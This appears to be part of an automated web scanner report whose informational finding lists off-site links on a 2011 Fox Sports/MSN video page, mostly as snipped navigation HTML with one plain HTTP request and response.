                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="Dallas">Dallas</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Orlando">Orlando</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsdetroit.com/" target="_blank" title="Detroit">Detroit</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsarizona.com/" target="_blank" title="Phoenix">Phoenix</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswisconsin.com/" target="_blank" title="Green Bay">Green Bay</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportscarolinas.com/" target="_blank" title="Raleigh">Raleigh</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportshouston.com/" target="_blank" title="Houston">Houston</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="San Antonio">San Antonio</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsmidwest.com/" target="_blank" title="Indianapolis">Indianapolis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsmidwest.com/" target="_blank" title="St. Louis">St. Louis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportskansascity.com/" target="_blank" title="Kansas City">Kansas City</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Tampa">Tampa</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.yardbarker.com/rumors" target="_blank" title="Rumors">Rumors</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
<li class="">


                                                           <a href="http://foxsports.seenon.com/?ecid=PRF-SM-500012&amp;PA=FoxSportNav2" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="msn-logo"><a href="http://redacted" class="out-link msn sprite" title="go to redacted"><span>
...[SNIP]...
<li>
               <a href="http://entertainment.redacted/" class="out-link" title="Entertainment">Entertainment</a>
...[SNIP]...
<li class="first" title="eEntertainment"><a href="http://wonderwall.redacted/" title="Celebrities">Celebrities</a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://thebubble.redacted/ " title="Comedy">Comedy</a></li>
<li class="" title="eEntertainment"><a href="http://entertainment.redacted/news/?ipp=15" title="Entertainment News ">Entertainment News </a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://zone.redacted/en-us/home" title="Games">Games</a></li>
<li class="" title="eEntertainment"><a href="http://movies.msn.com/" title="Movies">Movies</a></li>
<li class="" title="eEntertainment"><a href="http://music.msn.com/" title="Music">Music</a></li>
<li class="" title="eEntertainment"><a href="http://movies.msn.com/new-on-dvd/movies/" title="New on DVD">New on DVD</a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://tv.redacted/" title=" TV"> TV</a></li>
<li class="last" title="eEntertainment"><a href="http://entertainment.redacted/video/?from=en-us_msnhp" title=" Video"> Video</a>
...[SNIP]...
<li>
   <a href="http://moneycentral.redacted/home.asp" class="out-link" title="Money">Money</a>
...[SNIP]...
<li class="first" title="money"><a href="http://autos.msn.com/" title="Autos">Autos</a></li>
<li class="" title="money"><a href="http://www.msnbc.redacted/id/3032072/ns/business" title="Business News">Business News</a>
...[SNIP]...
<li class="" title="money"><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" title="Careers &amp; Jobs">Careers & Jobs</a>
...[SNIP]...
<li class="" title="money"><a href="http://money.msn.com/investing" title="Investing">Investing</a></li>
<li class="" title="money"><a href="http://money.msn.com/personal-finance" title="Personal Finance">Personal Finance</a>
...[SNIP]...
<li class="" title="money"><a href="http://investing.money.redacted/investments/stock-price" title="Quotes">Quotes</a></li>
<li class="" title="money"><a href="http://realestate.redacted/" title="Real Estate &amp; Rentals">Real Estate & Rentals</a>
...[SNIP]...
<li class="last" title="money"><a href="http://money.msn.com/money-video" title="Video">Video</a>
...[SNIP]...
<li>
   <a href="http://lifestyle.redacted/default.aspx" class="out-link" title="Lifestyle">Lifestyle</a>
...[SNIP]...
<li class="first" title="lifestyle"><a href="http://lifestyle.redacted/your-look/" title="Beauty &amp; Fashion">Beauty & Fashion</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://www.delish.com/" title=" Cooking"> Cooking</a></li>
<li class="" title="lifestyle"><a href="http://lifestyle.redacted/your-home/" title="Decor &amp; Organizing">Decor & Organizing</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://fitbie.msn.com" title="Fitbie">Fitbie</a></li>
<li class="" title="lifestyle"><a href="http://glo.redacted/" title="Glo: For Her">Glo: For Her</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://health.msn.com/" title="Health">Health</a></li>
<li class="" title="lifestyle"><a href="http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS" title="Horoscopes">Horoscopes</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://lifestyle.redacted/relationships/" title="Love &amp; Relationships">Love & Relationships</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670269" title="Online Dating">Online Dating</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " title=" Travel"> Travel</a></li>
<li class="last" title="lifestyle"><a href="http://lifestyle.redacted/your-look/video/?from=en-us_msnhp" title="Video">Video</a>
...[SNIP]...
<li id="msn-more">
   <a href="http://specials.msn.com/alphabet.aspx " class="msn-more" title="More">More</a>
...[SNIP]...
<li class="first" title="more"><a href="http://autos.msn.com/" title="Autos">Autos</a></li>
<li class="" title="more"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" title="Maps &amp; Directions">Maps & Directions</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" title="Video">Video</a></li>
<li class="" title="more"><a href="http://careers.msn.com/" title="Careers &amp; Jobs">Careers & Jobs</a>
...[SNIP]...
<li class="" title="more"><a href="http://my.redacted/" title="My MSN">My MSN</a></li>
<li class="" title="more"><a href="http://local.msn.com/weather.aspx" title="Weather">Weather</a></li>
<li class="" title="more"><a href="http://insidemsn.wordpress.com" title="Corrections &amp; Clarifications">Corrections & Clarifications</a>
...[SNIP]...
<li class="" title="more"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268" title="Personals">Personals</a></li>
<li class="" title="more"><a href="http://msn.whitepages.com/" title="White Pages">White Pages</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.delish.com/" title="Delish">Delish</a></li>
<li class="" title="more"><a href="http://investing.money.redacted/investments/stock-price" title="Quotes">Quotes</a></li>
<li class="" title="more"><a href="http://wonderwall.redacted/" title="Wonderwall">Wonderwall</a>
...[SNIP]...
<li class="" title="more"><a href="http://games.msn.com/" title="Games Preview">Games Preview</a>
...[SNIP]...
<li class="" title="more"><a href="http://realestate.redacted/" title="Real Estate/Rentals">Real Estate/Rentals</a>
...[SNIP]...
<li class="" title="more"><a href="http://yellowpages.redacted/" title="Yellow Pages">Yellow Pages</a>
...[SNIP]...
<li class="" title="more"><a href="http://astrocenter.astrology.redacted" title="Horoscopes">Horoscopes</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/shopping?FORM=SHOPH2" title="Shopping">Shopping</a></li>
<li class="" title="more"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" title="Feedback">Feedback</a></li>
<li class="" title="more"><a href="http://local.msn.com/news.aspx" title="Local Edition">Local Edition</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " title="Travel">Travel</a></li>
<li class="last" title="more"><a href="http://specials.msn.com/alphabet.aspx" title="Full MSN Index">Full MSN Index</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?FORM=FOXSP" class="bing-link" title="Bing">Bing</a>
...[SNIP]...
<div class="itemWrapper">
<a class='item' href='http://www.foxsportswisconsin.com/msn/01/28/11/Lessons-learned-from-last-Steelers-game/landing.html?blockID=399673&amp;feedID=5059' title="" onmouseover="if(this.title=='')this.title=unscapeHTML('Hard lessons');" onclick="javascript:fsAnalytics(this, {description: 'tombstone - clickthrough - ' + unscapeHTML('Hard lessons') });location.href=this.href;">
<div id="blurb_2" align="left" class="blurb">
...[SNIP]...
<div class="itemWrapper">
<a class='item' href='http://www.foxsportsflorida.com/msn/01/29/11/Nations-coolest-cities-have-many-of-NBAs/landing_reiter.html?blockID=400120&amp;feedID=3722' title="" onmouseover="if(this.title=='')this.title=unscapeHTML('Run this town');" onclick="javascript:fsAnalytics(this, {description: 'tombstone - clickthrough - ' + unscapeHTML('Run this town') });location.href=this.href;">
<div id="blurb_4" align="left" class="blurb">
...[SNIP]...
<div class="itemWrapper">
<a class='item' href='http://www.foxsportswisconsin.com/msn/01/27/11/Dance-the-Raji/landing.html?blockID=399089&amp;feedID=5059' title="" onmouseover="if(this.title=='')this.title=unscapeHTML('Dance party');" onclick="javascript:fsAnalytics(this, {description: 'tombstone - clickthrough - ' + unscapeHTML('Dance party') });location.href=this.href;">
<div id="blurb_5" align="left" class="blurb">
...[SNIP]...
<div class="itemWrapper">
<a class='item' href='http://www.foxsportsflorida.com/msn/01/28/11/Lack-of-trust-not-lack-of-Bosh-hurts-mos/landing_reiter.html?blockID=399356&amp;feedID=7926' title="" onmouseover="if(this.title=='')this.title=unscapeHTML('Not a pretty sight');" onclick="javascript:fsAnalytics(this, {description: 'tombstone - clickthrough - ' + unscapeHTML('Not a pretty sight') });location.href=this.href;">
<div id="blurb_6" align="left" class="blurb">
...[SNIP]...
<div class="itemWrapper">
<a class='item' href='http://www.foxsportstennessee.com/msn/01/27/11/Fisher-and-the-Future/landing_titans.html?blockID=399272&amp;feedID=3732' title="" onmouseover="if(this.title=='')this.title=unscapeHTML('Rare breed');" onclick="javascript:fsAnalytics(this, {description: 'tombstone - clickthrough - ' + unscapeHTML('Rare breed') });location.href=this.href;">
<div id="blurb_7" align="left" class="blurb">
...[SNIP]...
<div class="fs-tune-in">

   
           <a href="http://itunes.apple.com/us/app/fox-sports-mobile/id294056623?mt=8#ls=1"><img src="http://static.foxsports.com/content/fscom/img/2010/12/14/300x90_20101214192718571_0_0.JPG" alt=""/>
...[SNIP]...
</div>


<a href="http://g.redacted/AIPRIV/en-us" target="_blank" style="float: right;*margin-bottom: 5px;" id="adChoices"><img src="http://blstc.redacted/br/chan/css/decoration/adchoicesv4.png"/></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/NHL?vid=8b302292-7bc5-49bb-b20a-bb7df387c2b7&amp;from=foxsports/nhl/stories'><img src="http://img5.catalog.video.redacted/image.aspx?uuid=8b302292-7bc5-49bb-b20a-bb7df387c2b7&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/NHL?vid=4f106944-1cfe-48f1-a72b-63a31c206d93&amp;from=foxsports/nhl/stories'><img src="http://img5.catalog.video.redacted/image.aspx?uuid=4f106944-1cfe-48f1-a72b-63a31c206d93&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/NHL?vid=98be1890-ccd5-45aa-b1cc-b3c896e10a15&amp;from=foxsports/nhl/stories'><img src="http://img5.catalog.video.redacted/image.aspx?uuid=98be1890-ccd5-45aa-b1cc-b3c896e10a15&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/NHL?vid=07820735-2940-48f9-aced-02c46e9a76b5&amp;from=foxsports/nhl/stories'><img src="http://img5.catalog.video.redacted/image.aspx?uuid=07820735-2940-48f9-aced-02c46e9a76b5&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/NHL?vid=bb344e55-7387-4d4c-bc39-9a98ab9968ec&amp;from=foxsports/nhl/stories'><img src="http://img5.catalog.video.redacted/image.aspx?uuid=bb344e55-7387-4d4c-bc39-9a98ab9968ec&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<div class="body">
<a title="Video: Who makes the tastiest frozen pizza?" class="main-story" href="http://www.bing.com/videos/watch/video/tastiest-frozen-pizza/q94x07p0?q=Pizza&rel=msn&from=en-us_msnhp&form=MSNXNM&ocid=xnetr4-1"><img alt="Frozen Pizza, c. Rubberball - Mike Kemp - Getty Images" border="0" height="90" width="90" src="http://blstb.redacted/i/59/A38490AFABAE7E3D494E8243D8FE6.jpg"><span class="copy">
...[SNIP]...
<li>
<a title="Bing: Air Force sex conviction" href="http://www.bing.com/search?q=air+force+chief+convicted+sexual+harassment&form=MSNXNM&ocid=xnetr4-2">Bing: Air Force sex conviction</a>
...[SNIP]...
<li>
<a title="PETA's new naked celeb" href="http://specials.msn.com/A-List/Entertainment/PETAs-newest-naked-celeb.aspx?cp-documentid=27450762&form=MSNXNM&ocid=xnetr4-3">PETA's new naked celeb</a>
...[SNIP]...
<li>
<a title="What's playing at the movies?" href="http://www.bing.com/entertainment/movies?form=MSNXNM&ocid=xnetr4-4">What's playing at the movies?</a>
...[SNIP]...
</div>


<a href="http://g.redacted/AIPRIV/en-us" target="_blank" style="float: right;*margin-bottom: 5px;" id="adChoices"><img src="http://blstc.redacted/br/chan/css/decoration/adchoicesv4.png"/></a>
...[SNIP]...
<h3>
                   <a href="http://www.ticketsnow.com/nhl-tickets/" target="_blank" title="NHL Tickets">NHL Tickets</a>
...[SNIP]...
<h3>
                   <a href="http://www.foxnews.com" title="FOX News">FOX News</a>
...[SNIP]...
<h3>
                   <a href="http://www.newscorp.com" title="News Corp.">News Corp.</a>
...[SNIP]...
<h3>
                   <a href="http://www.fox.com" title="FOX">FOX</a>
...[SNIP]...
<h3>
                   <a href="http://www.foxsportssupports.com" title="FOX Sports Supports">FOX Sports Supports</a>
...[SNIP]...
<h3>
                   <a href="http://www.fxnetworks.com" title="FX">FX</a>
...[SNIP]...
<h3>
                   <a href="http://www.speedtv.com" title="Speed TV">Speed TV</a>
...[SNIP]...
<h3>
                   <a href="http://www.fuel.tv" title="NCAAFuel TV">Fuel TV</a>
...[SNIP]...
<li>
                       <a href="http://www.foxcareers.com" title="Jobs">Jobs</a></li>
                   <li>
                       <a href="http://surveys2.researchresults.com/192/0030/1920030.htm?l=1" title="Join Our Opinion Panel">Join Our Opinion Panel</a>
...[SNIP]...
<li>
                       <a href="http://www.fox.com" title="FOX.com">FOX.com</a>
...[SNIP]...
<li>
                       <a href="http://www.foxnews.com" title="FOX News">FOX News</a>
...[SNIP]...
<li>
                       <a href="http://www.newscorp.com" title="News Corp">News Corp.</a>
...[SNIP]...
<li class="last">
                       <a href="http://www.foxsportssupports.com" title="FOX Sports Supports">FOX Sports Supports</a>
...[SNIP]...
<!-- Begin comScore Tag -->
<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000001&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkId=74170" title="MSN Privacy">MSN Privacy</a>
...[SNIP]...
<li><a target="_blank" href="http://g.redacted/0TO_/enus" title="Legal">Legal</a>
...[SNIP]...
<li><a target="_blank" href="http://advertising.redacted/home/home.asp" title="Advertise">Advertise</a>
...[SNIP]...
<li><a target="_blank" href="http://rss.redacted/" title="RSS">RSS</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us">About our ads</a>
...[SNIP]...

22.241. http://msn.foxsports.com/video

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /video

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /video?from=en-us_msnhp HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 210513
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=31
Date: Sat, 29 Jan 2011 23:49:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
<link type="text/css" rel="stylesheet" href="/component/cssjs/VideoCSS" />

<script type="text/javascript" lang="javascript" src="http://cdn.gigya.com/JS/socialize.js?apikey=2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.redacted/js/vp.js"></script>
...[SNIP]...
<li>
<a href="http://www.speed.com/" title="Speed" class="speed" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Speed'});" target="_blank">SPEED</a>
...[SNIP]...
<li>
<a href="http://www.scout.com/" title="Scout" class="scout" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Scout'});" target="_blank">SCOUT</a>
...[SNIP]...
<li>
<a href="http://www.foxdeportes.com/" title="Deportes" class="deportes" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Deportes'});" target="_blank">DEPORTES</a>
...[SNIP]...
<li>
<a href="http://www.whatifsports.com" title="What If" class="what-if" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - What If'});" target="_blank">WHAT IF</a>
...[SNIP]...
<li>
<a href="http://fsr-pr.clearchannel.com" title="FOX Sports Radio" class="radio" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Fox Sports Radio'});" target="_blank">RADIO</a>
...[SNIP]...
<li>
<a href="http://foxsports.seenon.com/?ecid=PRF-SM-500003&PA=FoxSportNav " title="Shop" class="shop" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Shop'});" target="_blank">SHOP</a>
...[SNIP]...
<li><a href="http://www.bing.com/search" id="wslink">Search the Web</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.ticketexchangebyticketmaster.com/NFL/?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=foxsports-nfl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.ticketsnow.com/mlb-tickets/?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
class="">


                                                        <a href="http://www.baseballamerica.com" target="_blank" title="Baseball America">Baseball America</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_mlb" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="">

   
                                    <a href="http://www.ticketsnow.com/auto-racing-tickets/?partnerCode=16068" title="Tickets">Tickets</a>
...[SNIP]...
class="">


                                                        <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
class="">


                                                        <a href="http://www.scenedaily.com/" target="_blank" title="Scene Daily">Scene Daily</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nascar" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.ticketsnow.com/nba-tickets/?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nba" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.ticketsnow.com/nhl-tickets/?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nhl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.ticketsnow.com/college-football-tickets/?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.ticketsnow.com/Sports_Tickets/NCAA_Mens_College_Basketball_Tickets.html?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="">

   
                                    <a href="http://foxsoccer.tv" title="FoxSoccer.tv">FoxSoccer.tv</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.ticketsnow.com/golf-tickets/?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.golfweek.com" target="_blank" title="Golfweek">Golfweek</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.ticketsnow.com/ultimate-fighting-championship-tickets/?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
p-down-off">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.tvg.com/special/FoxSportsJumpPage_final.htm" target="_blank" title="Odds/Results">Odds/Results</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.tvg.com/special/FoxSportsJumpPage_final.htm" target="_blank" title="TVG">TVG</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.racereplays.com/foxsports/index.cfm?start=ws_foxsports.com_navbar" target="_blank" title="Race Replays">Race Replays</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Race Series">Air Race Series</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswest.com/" target="_blank" title="Anaheim ">Anaheim </a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswest.com/" target="_blank" title="Los Angeles">Los Angeles</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouth.com/" target="_blank" title="Atlanta">Atlanta</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportstennessee.com/" target="_blank" title="Memphis">Memphis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.nesn.com/" target="_blank" title="Boston">Boston</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Miami">Miami</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportscarolinas.com/" target="_blank" title="Charlotte">Charlotte</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswisconsin.com/" target="_blank" title="Milwaukee">Milwaukee</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Cincinnati">Cincinnati</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsnorth.com/" target="_blank" title="Minneapolis">Minneapolis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Cleveland">Cleveland</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportstennessee.com/" target="_blank" title="Nashville">Nashville</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Columbus">Columbus</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="Oklahoma City">Oklahoma City</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="Dallas">Dallas</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Orlando">Orlando</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsdetroit.com/" target="_blank" title="Detroit">Detroit</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsarizona.com/" target="_blank" title="Phoenix">Phoenix</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswisconsin.com/" target="_blank" title="Green Bay">Green Bay</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportscarolinas.com/" target="_blank" title="Raleigh">Raleigh</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportshouston.com/" target="_blank" title="Houston">Houston</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="San Antonio">San Antonio</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsmidwest.com/" target="_blank" title="Indianapolis">Indianapolis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsmidwest.com/" target="_blank" title="St. Louis">St. Louis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportskansascity.com/" target="_blank" title="Kansas City">Kansas City</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Tampa">Tampa</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.yardbarker.com/rumors" target="_blank" title="Rumors">Rumors</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
<li class="">


                                                           <a href="http://foxsports.seenon.com/?ecid=PRF-SM-500012&amp;PA=FoxSportNav2" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="msn-logo"><a href="http://redacted" class="out-link msn sprite" title="go to redacted"><span>
...[SNIP]...
<li>
               <a href="http://entertainment.redacted/" class="out-link" title="Entertainment">Entertainment</a>
...[SNIP]...
<li class="first" title="eEntertainment"><a href="http://wonderwall.redacted/" title="Celebrities">Celebrities</a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://thebubble.redacted/ " title="Comedy">Comedy</a></li>
<li class="" title="eEntertainment"><a href="http://entertainment.redacted/news/?ipp=15" title="Entertainment News ">Entertainment News </a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://zone.redacted/en-us/home" title="Games">Games</a></li>
<li class="" title="eEntertainment"><a href="http://movies.msn.com/" title="Movies">Movies</a></li>
<li class="" title="eEntertainment"><a href="http://music.msn.com/" title="Music">Music</a></li>
<li class="" title="eEntertainment"><a href="http://movies.msn.com/new-on-dvd/movies/" title="New on DVD">New on DVD</a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://tv.redacted/" title=" TV"> TV</a></li>
<li class="last" title="eEntertainment"><a href="http://entertainment.redacted/video/?from=en-us_msnhp" title=" Video"> Video</a>
...[SNIP]...
<li>
   <a href="http://moneycentral.redacted/home.asp" class="out-link" title="Money">Money</a>
...[SNIP]...
<li class="first" title="money"><a href="http://autos.msn.com/" title="Autos">Autos</a></li>
<li class="" title="money"><a href="http://www.msnbc.redacted/id/3032072/ns/business" title="Business News">Business News</a>
...[SNIP]...
<li class="" title="money"><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" title="Careers &amp; Jobs">Careers & Jobs</a>
...[SNIP]...
